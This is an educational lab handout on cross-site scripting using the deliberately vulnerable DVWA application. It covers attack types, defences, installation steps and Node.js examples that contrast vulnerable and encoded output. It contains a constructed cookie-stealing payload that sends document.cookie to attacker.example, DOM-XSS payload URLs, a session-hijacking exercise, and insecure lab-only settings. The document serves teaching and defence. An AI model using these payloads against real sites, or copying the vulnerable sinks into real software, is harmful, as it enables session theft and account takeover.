Advanced Cyber
2. Cross-site Scripting (XSS)
Objective: To learn about XSS attacks and how to mitigate them.
Tools: DVWA
What is XSS?
Cross-Site Scripting (XSS) is a type of security vulnerability commonly found in web
applications. It allows attackers to inject malicious scripts into content that other users will see.
This can lead to a variety of harmful outcomes, such as stealing session cookies, redirecting users
to malicious sites, or defacing web pages. Here are the main types of XSS attacks:
1. Stored XSS: The malicious script is permanently stored on the target server, such as in a
database, and is served to users who visit the affected page. For example, if a user posts a
comment containing a malicious script, and this comment is displayed to others, it’s a stored XSS
attack.
2. Reflected XSS: The malicious script arrives in the request itself, usually in a URL or form
parameter, and the server echoes it straight back into the response without storing it. Because the
victim has to send the crafted request, this type of XSS is often delivered through phishing links.
3. DOM-based XSS: The vulnerability lies in the client-side JavaScript rather than on the server.
The page's own script reads attacker-controlled data from a source such as the URL and writes it
into the DOM (Document Object Model) through a sink such as document.write or innerHTML, so the
payload executes without the server having to echo it; when the payload rides in the URL fragment
(after #), the server never even receives it.
# How XSS Attacks Work
1. Injection: The attacker gets a malicious script into a page of the web application, either by
storing it, by reflecting it through a request parameter, or by feeding it to client-side code.
2. Execution: The victim's browser runs the injected script in the origin of the vulnerable site, so
it can read that site's cookies (unless they are flagged HttpOnly), read and modify the page, and
send requests with the victim's session.
3. Impact: The script can capture sensitive data such as session tokens, manipulate the user's view
of the site, or redirect the user to malicious sites.
# Preventing XSS
1. Input Validation: Validate all user input against what the application actually expects (type,
length, allowed characters) and reject anything else. Validation shrinks the attack surface, but on
its own it does not stop XSS: encoding belongs at output time, not at storage time, because the
same stored value may later be rendered in several different contexts.
2. Output Encoding: Encode data for the context in which it is rendered so the browser treats it as
text, not code: HTML entity encoding for HTML body and attribute values (&lt; for <, &quot; for ",
and so on), and JavaScript or URL encoding where data lands in those contexts.
3. Use Security Libraries and Frameworks: Most modern templating engines auto-escape output by
default. Use them, and avoid their "raw" or "unescaped" output helpers unless the value is known
to be safe.
4. Content Security Policy (CSP): Send a CSP header that restricts where scripts may be loaded from
and disallows inline scripts (for example script-src 'self' without 'unsafe-inline'). CSP does not
fix the injection itself, but it stops many injected payloads from executing.
Staying informed about best practices and continuously reviewing and testing your applications
are crucial steps in maintaining security against XSS vulnerabilities.
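The three attack steps and the four defences above read more concretely in code. The following is an added example written for this handout, not code from DVWA or from the original page: a greeting page that echoes a name parameter into its HTML, first by plain string concatenation (the shape of a reflected-XSS bug), then with HTML entity encoding, plus the CSP header value and the HttpOnly cookie flag that limit what a payload can do when the encoding is missed. The attacker host attacker.example, the cookie name SESSIONID and the payload are constructed for the example. It runs under Node.js with no dependencies.

```javascript
// Added example (not from the lab handout or DVWA): a reflected-XSS sink beside
// encoded output, plus CSP and HttpOnly as defence in depth. Node.js, no deps.

// HTML entity encoding for the HTML body and quoted-attribute contexts.
// These five characters are the ones that can break out of text or an attribute.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Vulnerable: the "name" parameter is echoed into the response body as-is,
// so markup in the request comes back as markup in the page.
function renderGreetingVulnerable(name) {
  return '<pre>Hello ' + name + '</pre>';
}

// Hardened: same page, but untrusted data is encoded for the HTML context
// at the moment it is written into the document.
function renderGreetingSafe(name) {
  return '<pre>Hello ' + escapeHtml(name) + '</pre>';
}

// Content-Security-Policy value that allows scripts only from the page's own
// origin and refuses inline <script> blocks and inline event handlers.
function cspHeaderValue() {
  return "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'";
}

// A session cookie flagged HttpOnly is invisible to document.cookie, so the
// classic cookie-stealing payload sees an empty string even if it does run.
// The cookie name is constructed for this example.
function sessionCookieHeader(sessionId) {
  return 'SESSIONID=' + sessionId + '; Path=/; HttpOnly; SameSite=Lax';
}

// Does a response body contain a <script> element the browser would execute?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed payload of the kind used in the reflected-XSS exercise:
// it sends document.cookie to an attacker-controlled host.
const PAYLOAD =
  "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>";

console.log('vulnerable:', renderGreetingVulnerable(PAYLOAD));
console.log('safe:      ', renderGreetingSafe(PAYLOAD));
console.log('CSP:       ', cspHeaderValue());
console.log('Set-Cookie:', sessionCookieHeader('constructed-session-id'));
```

Run it with node and compare the two renderings: the vulnerable one contains a live script element, the safe one shows the payload as harmless text. Encoding is context-specific: escapeHtml is correct inside an element body or a quoted attribute, but not for data placed inside a script block or a URL, which need their own encoders.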
[Link] CSE- Pag
CY, e
TOOL DVWA: DVWA (Damn Vulnerable Web Application) is a deliberately insecure PHP/MySQL web
application built for education and training in cybersecurity and ethical hacking. It provides a
safe, controlled environment for learning about web application vulnerabilities and practising
penetration testing techniques. Because every part of it is intentionally exploitable, it is not
intended for production and should run only in an isolated lab VM or network.
Installation of DVWA
Requirements: Kali Linux with the Apache web server, MySQL (MariaDB) and PHP installed.
Step 1: In a browser, search for the DVWA GitHub repository and copy its clone URL: [Link]
Step 2: In a terminal, change into the web server's document root, the default directory Apache
serves files from (/var/www/html on a standard Kali install), and download DVWA there with git
clone so it is served like any other web application.
Step 3: If you are already root, run the git clone command as it is; otherwise prefix it with sudo,
because the document root is not writable by an ordinary user.
Then change the permissions of the downloaded DVWA directory so the web server can read and write
it (the lab grants full permissions; acceptable on a disposable lab VM, never on a shared or
production host).
The file [Link] holds the default configuration. Copy it to a file with a .php extension and edit
only the copy; the original keeps the default values in case anything needs to be restored later.
Step 4: Open the copied config file in an editor (nano [Link], then Ctrl+O to save and Ctrl+X to
exit, or vi) and press Enter.
Step 5: In the config file set the database user to admin and the database password to password
(the same values must be used when the MySQL user is created in Step 7), then save and close the
file.
Step 6: Configure the database. First start MySQL (service mysql start).
Log in with the -u option; the default administrative user of MySQL is root.
Step 7: Once logged in, set up the database:
Create the user: the username and password must match the config file, and bind the user to the
loopback address [Link] so it can only connect from the local machine.
Grant the privileges on the DVWA database to this user.
Then type exit and clear the screen.
Step 8: Configure and start the web server (service apache2 start).
Step 9: Configure the server's PHP settings.
Edit the PHP configuration file with an editor (gedit [Link] also works).
The allow_url_fopen and allow_url_include directives must be set to On; DVWA's setup page checks
both. allow_url_include in particular is an insecure setting and is enabled only because the lab
exercises depend on it.
Step 10: Restart Apache so the PHP changes take effect (service apache2 restart).
Step 11: In a browser open [Link]/DVWA
On first use DVWA shows its setup page; click Create / Reset Database.
Log in with username admin and password password.
If the setup page appears again, click the create/open database button once more and log in again.
Example: Reflected XSS
Example: Get cookie information. With the security level set to low, inject a script that reads
document.cookie to obtain the session ID. Replaying that session cookie in Burp lets you use the
account without knowing the credentials (session hijacking).
Try the same at the medium and high security levels and observe which filters each level adds.
Stored XSS:
Example 1)
Example 2) Malicious script: the script is saved on the server and executes for every user who
later views the affected page.
DOM-based XSS: no text box is available on this page; the only input is the URL itself, whose
parameter is read by the page's client-side JavaScript and written into the DOM.
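Since the only input here is the URL, it helps to see what a client-side parser takes from it and what the server ever gets to see. The following is an added example, not DVWA's source or code from the handout: a sink that slices the default= parameter out of location.href and writes it into an option element by string building in the document.write style (a common shape for this class of bug), beside what the server receives from the same URL and an allowlist-based fix. The languages list, the 127.0.0.1/DVWA URLs and the payload are constructed for the example. It runs under Node.js.

```javascript
// Added example (not DVWA's source): a DOM-XSS source and sink, what the server
// receives from the same URL, and an allowlist fix. Node.js, no dependencies.

// Client-side source: the page slices everything after "default=" out of the
// full href, as a hand-rolled parser does. This includes the fragment (#...)
// and anything that follows it.
function readDefaultFromHref(href) {
  const i = href.indexOf('default=');
  return i === -1 ? '' : href.substring(i + 'default='.length);
}

// Vulnerable sink: the raw value is written into an <option> element, so a
// value that closes the tag and opens a new element injects live markup.
function vulnerableOptionMarkup(href) {
  const lang = readDefaultFromHref(href);
  return "<option value='" + lang + "'>" + decodeURIComponent(lang) + '</option>';
}

// What the server receives: the browser sends only path and query string; the
// fragment never leaves the client. A server-side filter on "default" is
// therefore blind to a payload carried in the fragment.
function serverVisibleDefault(href) {
  return new URL(href).searchParams.get('default');
}

// Hardened client: treat the parameter as a key into an allowlist and emit
// only values the application itself defines (constructed list).
const LANGUAGES = ['English', 'French', 'Spanish', 'German'];
function safeOptionMarkup(href) {
  const requested = serverVisibleDefault(href) || LANGUAGES[0];
  const chosen = LANGUAGES.includes(requested) ? requested : LANGUAGES[0];
  return "<option value='" + chosen + "'>" + chosen + '</option>';
}

// Does the generated markup contain an <img> element with an onerror handler?
function containsImgOnerror(html) {
  return /<img\b[^>]*onerror=/i.test(html);
}

// Constructed URLs for a local lab host: a benign one, one with the payload in
// the query string, and one hiding the same payload behind a fragment.
const BENIGN = 'http://127.0.0.1/DVWA/?default=English';
const IN_QUERY = 'http://127.0.0.1/DVWA/?default=English</option></select><img src=x onerror=alert(document.cookie)>';
const IN_FRAGMENT = 'http://127.0.0.1/DVWA/?default=English#</option></select><img src=x onerror=alert(document.cookie)>';

console.log('client writes :', vulnerableOptionMarkup(IN_FRAGMENT));
console.log('server sees   : default=' + serverVisibleDefault(IN_FRAGMENT));
console.log('allowlist fix :', safeOptionMarkup(IN_FRAGMENT));
```

The fragment case is the one to remember: a payload after # is processed by the vulnerable script exactly like one in the query string, yet the server receives only default=English, so server-side filtering or WAF rules never see it. In a real browser location.href may percent-encode characters such as < in the fragment, which is why pages of this shape call decodeURI on the value before writing it; the raw strings used here skip that step.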
Reference links:
[Link]
[Link]